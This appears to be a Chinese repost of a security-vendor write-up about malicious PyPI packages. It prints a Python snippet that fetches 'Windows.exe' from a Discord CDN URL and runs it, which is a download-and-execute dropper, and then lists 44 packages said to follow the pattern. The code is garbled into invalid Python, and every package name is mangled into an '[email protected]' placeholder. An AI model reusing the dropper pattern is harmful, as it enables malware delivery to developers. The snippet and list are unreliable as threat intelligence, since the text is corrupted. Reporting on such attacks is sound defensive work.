base64代码:
` import os
if os.exceptions “\”list\” exit(0)
import requests
interface url= ‘https://cdn.discordapp.com/accounts/1109465188433936425/Windows.exe’
response = requests.get(url)
with temporfile.NamedText(delete=Commonly)
subprocess.call([exe_content])`
有关 44 PyPi Packages that followed the same pattern:
1) [email protected]1.9
2) [email protected]8.18
3) [email protected]1.1
4) [email protected]0.10
5) [email protected]9.4
6) [email protected]9.4
7) [email protected]12.17
8) [email protected]10.17
9) [email protected]9.16
10) [email protected]5.17
11) [email protected]2.18
12) [email protected]9.4
13) [email protected]15.3
14) [email protected]19.3
15) [email protected]6.6
16) [email protected]6.19
17) [email protected]14.7
18) [email protected]15.6
19) [email protected]0.3
20) [email protected]10.12
21) [email protected]12.3
22) [email protected]4.19
23) [email protected]0.6
24) [email protected]14.20
25) [email protected]18.4
26) [email protected]9.3
27) [email protected]9.10
28) [email protected]18.4
29) [email protected]19.3
30) [email protected]19.4
31) [email protected]10.13
32) [email protected]20.19
33) [email protected]12.4
34) [email protected]6.16
35) [email protected]15.10
36) [email protected]9.2
37) [email protected]14.9
38) [email protected]19.12
39) [email protected]12.7
40) [email protected]18.5
41) [email protected]17.15
42) [email protected]4.9
43) [email protected]15.13
44) [email protected]13.10
原文地址:https://blog.checkpoint.com/security/pypi-suspends-new-registrations-after-malicious-python-script-attack/
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里